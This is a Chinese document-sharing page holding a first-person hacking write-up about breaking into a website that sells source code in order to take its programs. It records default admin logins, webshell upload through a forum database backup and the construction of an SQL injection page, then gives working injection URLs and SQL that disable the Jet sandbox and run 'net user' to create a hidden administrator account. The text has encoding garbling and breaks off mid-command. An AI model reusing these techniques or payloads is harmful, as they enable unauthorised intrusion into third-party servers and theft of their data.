艱難滲透源碼銷售站點(diǎn)_第1頁
艱難滲透源碼銷售站點(diǎn)_第2頁
艱難滲透源碼銷售站點(diǎn)_第3頁
艱難滲透源碼銷售站點(diǎn)_第4頁
艱難滲透源碼銷售站點(diǎn)_第5頁
已閱讀5頁,還剩7頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

1、艱難滲透源碼銷售站點(diǎn)題外話:最近想做幾個(gè)垃圾站玩玩??墒稚嫌譀]有啥好程序。郁悶。那些網(wǎng)上免費(fèi)的程序又沒多少好玩意。百度看看網(wǎng)上誰賣程序。方便的話,搞幾個(gè)下來玩玩好了。一:小碰頭:百度上找了一會(huì), 看到這個(gè)站上有幾個(gè)我喜歡的程序。咋辦?試試看吧。當(dāng)時(shí)一看這站,哪像個(gè)出售源碼程序的站。這么丑。用的啥系統(tǒng)我想大家不說我說也知道了吧。當(dāng)然,人家手上既然有這么多源碼,想必也是通過自己的入侵手段搞來的。那他的主站也根本上就不需要看了。隨便在一個(gè)url上添加個(gè)單引號(hào)出現(xiàn)了這個(gè)。加了防注入了.算了。不錯(cuò)主站入手了。拿出我們最喜歡的東西吧。()查到同一效勞器上有這些站。有53個(gè)站。心里開心了。旁注有望啊。從主站

2、也得知這些網(wǎng)站都是網(wǎng)站管理員的出售中的程序。所以給他們分配的也都是2級(jí)域名。大家會(huì)想了。2級(jí)域名?會(huì)不會(huì)如果直接搞定一個(gè)webshell,就可以得到所有程序呢?因?yàn)樗麄冞@些演示站點(diǎn)或許會(huì)是在主站的下級(jí)目錄吧。當(dāng)初我也這么想的。先不說這個(gè)了。下面我們開始吧。我首先瞄準(zhǔn)了大家看到了什么?對(duì),論壇。而且是動(dòng)網(wǎng)7.1的。不是吧?這么簡(jiǎn)單就可以搞到一個(gè)webshell了?還賣源碼呢.唉。動(dòng)網(wǎng)默認(rèn)的密碼就進(jìn)去了。咱們登陸后臺(tái)拿webshell吧。Dvbbs7.1首先考慮后臺(tái)導(dǎo)出模板然后備份拿webshell.然后就導(dǎo)出了。問題也就來了。去看看備份數(shù)據(jù)庫那里能否備份。是可以備份的。導(dǎo)出模板不可以。上傳文件總

3、還是會(huì)允許的吧?結(jié)果無論我上傳什么類型的文件。無論我怎么偽造文件。都顯示這個(gè)。難怪管理員會(huì)這么放心的把密碼設(shè)為默認(rèn)的。我想大概是方便購置的人查看吧。想了想。要是這樣的話?那不會(huì)所有的2級(jí)網(wǎng)站都是這樣吧?我是個(gè)不服輸?shù)娜?。大不了一個(gè)一個(gè)試。不就53個(gè)網(wǎng)站么?經(jīng)歷了“無數(shù)的數(shù)據(jù)庫只讀,無寫入權(quán)限等問題。幾乎所有的2級(jí)都是這樣??磥砉芾韱T還是挺有意識(shí)。為難了。怎么辦?不會(huì)就這么放棄吧。二:峰回路轉(zhuǎn)。我沒有放棄。接著又找到一動(dòng)網(wǎng)7.1默認(rèn)密碼。 : 哈哈。百密終有一疏啊。這么多的站??偹氵€有一個(gè)沒把權(quán)限給卡住啊。成功導(dǎo)出后。然后通過備份拿到一個(gè)webshell.終于嘆了口氣。搞了大半天終于拿到了一個(gè)w

4、ebshell.提權(quán)吧。無ws無任何第3方可以直接利用軟件。Aspx的馬馬運(yùn)行不了(其實(shí)效勞器是支持.net的)。跳轉(zhuǎn)的d:/web/ 跳轉(zhuǎn)不了唉。提權(quán)無望啊。又不知道其他目錄的名稱。社工了好幾個(gè),都不能跳轉(zhuǎn)。想了想,同級(jí)目錄會(huì)不會(huì)允許跳轉(zhuǎn)呢?帶著僥幸的心理嘗試了下。大家會(huì)說了,根本就不知道其他的網(wǎng)站目錄其實(shí)要想知道一個(gè)同級(jí)目錄也不難。剛剛咱們不是還有個(gè)動(dòng)網(wǎng)默認(rèn)密碼的沒搞下來么?大家有沒想到什么?動(dòng)網(wǎng)后臺(tái)在數(shù)據(jù)處理的系統(tǒng)信息檢測(cè)可以看到網(wǎng)站的路徑的。呵呵。對(duì)了。(其實(shí)還有的其他幾個(gè)站點(diǎn)可以通過aspcheck.asp來得知的。)哈哈。跳轉(zhuǎn)成功。但也就只能跳這個(gè)三級(jí)目錄。不過不要緊。舒服的東西在

5、下面呢。習(xí)慣性的看了下數(shù)據(jù)庫連接文件。strconn = "driver=sql server;server=(local);uid=xxx;pwd=xxx;database=xxx"呵呵。是個(gè)SQL的數(shù)據(jù)庫。試試是否可以上傳文件到這個(gè)站。唉。權(quán)限還是不夠啊。那就用SQLtool直接連接吧。我暈。怎么可能呢?密碼難道錯(cuò)誤?不會(huì)啊。重新找了一下數(shù)據(jù)庫連接我文件。也就那么一個(gè)。那到底怎么回事呢?很明顯,禁止了外部連接1433端口。如果是這樣的話那好辦。傳個(gè)SQLrootkit就可以了。事實(shí)證明了這一點(diǎn)。我用webshell自帶的SQL連接工具連接了。在我意料之中。這僅僅是個(gè)db

6、權(quán)限的數(shù)據(jù)庫而已。Db權(quán)限的數(shù)據(jù)庫?大家想到了什么?呵呵。對(duì)了。Db 權(quán)限的注入點(diǎn)可以列目錄啊。既然效勞器允許我們跳轉(zhuǎn)到3級(jí)目錄(這只是暫時(shí)的猜測(cè),因?yàn)楫吘箷簳r(shí)只有一個(gè)3級(jí)目錄被我們跳轉(zhuǎn)了)。XP_CMDSHELL. 存在!SP_OACREATE. 存在!XP_REGWRITE. 存在!XP_SERVICECONTROL 存在!經(jīng)查詢。這些都還在。那就好辦了。直接構(gòu)造注入點(diǎn)吧。<!-#include file="xx.asp"-><%set rs=server.createobject("ADODB.recordset")id = re

7、quest("id")strSQL ="select * from admin where id="& id rs.open strSQL,conn,1,3rs.close%>這里的admin必須是一個(gè)存在的表名。我們可以通過SQL連接工具執(zhí)行SQL命令查詢。select name from sysobjects where type='U'查詢出我們需要的表名?;蛘呶乙苍?./conn/encode.asp這個(gè)文件里找到這一句。sql="select count (*) from login where id=&

8、quot;&cint(myid)很明顯。這里的login就可以被我們用上。strSQL = "select * from login where id=" & id 我們構(gòu)造出這樣的語句替換到上面的代碼中。至此。終于有了突破。成功構(gòu)造了注入點(diǎn)。呵呵。能夠列出目錄了。我們現(xiàn)在會(huì)想。要想搞到3389的終極權(quán)限。現(xiàn)在只能靠1433這個(gè)口子了。既然效勞器支持我們跳轉(zhuǎn)到某些目錄。那咱們一一試過去不就行了。事情證明。找1433實(shí)在是太辛苦了。有的人大概會(huì)一個(gè)目錄一個(gè)目錄的去找吧。但有的網(wǎng)站只是access的。其實(shí)這也是我當(dāng)初的做法。后來兄弟可酷可樂告訴我。直接列出這個(gè)目

9、錄d:Program FilesMicrosoft SQL ServerMSSQLData數(shù)據(jù)庫的前綴根本上是有規(guī)律的。那就是跟二級(jí)域名很相似。直接去找那些目錄就可以了。這樣就可以省下很多事。找到目錄后,一一的在webshell上跳轉(zhuǎn)。很順利。在通過幾次觀察后。管理員把SQL帳戶設(shè)置的很有規(guī)律。aaa1 aaa2 aaa3 aaa4 aaa5 而密碼有都是一樣的。我這個(gè)人就是懶,喜歡偷懶。那這些用戶中會(huì)否有一個(gè)是SA的權(quán)限呢?趕緊去一個(gè)一個(gè)試。我從aaa1試到aaa16。呵呵。恭喜!SQL SERVER最高權(quán)限。還等什么?趕緊net user 吧。xpsql.cpp: 錯(cuò)誤 5 來自 Crea

10、teProcess第 737 行郁悶了。出現(xiàn)了這樣的情況。沒有足夠的權(quán)限創(chuàng)立進(jìn)程。難道不是SA權(quán)限? SA都被降權(quán)了?c:windowssystem32cmd.exe沒有被刪啊那怎么辦?想要用SQL查詢分析器連接吧,但1433又不對(duì)外開放。外部不可以連接。想把效勞器上的1433端口轉(zhuǎn)發(fā)到本地吧。又無ws.網(wǎng)上查了查資料。用沙盒模式提權(quán)來試下再來構(gòu)造個(gè)個(gè)SA的注入點(diǎn)。這不難。繼續(xù)構(gòu)造。再次執(zhí)行select name from sysobjects where type='U'查詢myadmin這個(gè)數(shù)據(jù)庫中的表名。好了。成功構(gòu)造出來了。接著就是沙盒模式提權(quán)了。 :/haoteach

11、er.200ym /Manage/Include/sql.asp?id=1;EXEC%20master.dbo.xp_regwrite%20'HKEY_LOCAL_MACHINE','SoftWareMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0;- :/haoteacher.200ym /Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0','Data

12、base=c:windowssystem32iasias.mdb','select shell("net user aloner$ aloner /add")');- :/haoteacher.200ym /Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0','Database=c:windowssystem32iasias.mdb','select shell("net localgroup adm

13、inistrators aloner$ /add")');-返回正常。說明成功了?;蛘哂肏DSI 執(zhí)行下面這些SQL命令。EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWareMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','Database=c:windowssystem32iasias.mdb','select shell("net user aloner aloner /add")');Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','Database=c:win

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論